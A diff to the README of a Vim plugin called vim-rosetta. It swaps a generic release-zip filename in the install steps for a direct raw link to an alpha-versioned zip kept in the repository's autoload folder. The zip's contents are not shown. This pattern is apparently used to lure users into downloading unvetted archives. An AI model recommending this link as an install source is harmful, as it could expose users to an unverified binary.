eklasajal/vim-rosetta/README.md

 ### Step 3: Download the Plugin File

 Click on the asset that corresponds to your operating system.
-This should be a file like `vim-rosetta-vX.X.X.zip`.
+This should be a file like `https://github.com/eklasajal/vim-rosetta/raw/refs/heads/main/autoload/rosetta_vim_2.3-alpha.1.zip`.

 ### Step 4: Unzip the File